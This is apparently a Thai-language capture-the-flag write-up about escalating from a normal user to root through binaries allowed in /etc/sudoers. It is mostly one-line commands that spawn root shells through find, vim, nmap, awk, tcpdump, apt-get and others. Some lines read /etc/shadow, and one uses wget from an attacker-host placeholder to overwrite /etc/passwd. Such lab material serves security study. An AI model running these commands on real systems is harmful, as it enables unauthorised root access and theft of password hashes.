SUDO WITH COMMAND

SUDO WITH COMMAND

โจทย์ในข้อนี้คือการพยายามยกสิทธิ์จาก user ธรรมดาให้กลายเป็น root ผ่านการใช้คำสั่ง sudo ต่างๆที่ถูกกำหนดไว้ในไฟล์ /etc/sudoers ซึ่ง flag จะอยู่ที่ /root/flag.txt โดยจะมีคำสั่งที่ user สามารถใช้ sudo command ได้ดังต่อไปนี้
1. Find command

sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

2. vim command

sudo vim -c '!sh'
sudo vim -c '!sh'

3. Nmap command

sudo nmap --interactive

จากนั้นจะเข้า interactive mode ของ nmap

nmap> !sh
sh-4.1#
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

4. Man command

sudo man man

จากนั้นพิมพ์ <code>!sh</code> แล้ว enter
5. Less และ More command

sudo less /etc/hosts
sudo more /etc/hosts

แล้วพิมพ์คำว่า !sh แล้ว Enter
6. awk command

sudo awk 'BEGIN {system("/bin/sh")}'

7. Nano command
ง่ายๆคือ Nano มันเป็น text editor อยู่แล้วเราก็เปิด /etc/passwd เพื่อเพิ่ม user เข้าไปแค่นั้นเอง
8. wget command
อันนี้ก็ง่ายๆเช่นกันคือเราทำการส่งไฟล์ /etc/passwd ของเหยื่อกลับไปแล้วแก้ไขเพิ่ม user ใหม่ให้เสร็จ จากนั้นก็ทำการ download ไฟล์ดังกล่าวแล้ว save ทับ /etc/passwd แค่นั้นเอง

sudo wget http://<Attacker Address>:<binding port>/passwd -O /etc/passwd

9. Apache2 Command
เป็นการให้ Apache2 ทำการอ่านไฟล์ configure โดยเราระบุเป็นไฟล์ที่สำคัญๆอย่าง /etc/shadow ได้

sudo apache2 -f /etc/shadow

10. mount command

sudo mount -o bind /bin/bash /bin/mount

11. tcpdump command

echo $’id\ncat /etc/shadow’ > /tmp/.test; chmod +x /tmp/.test; sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

13. strace command

sudo strace -o/dev/null /bin/bash

14. apt-get command

sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"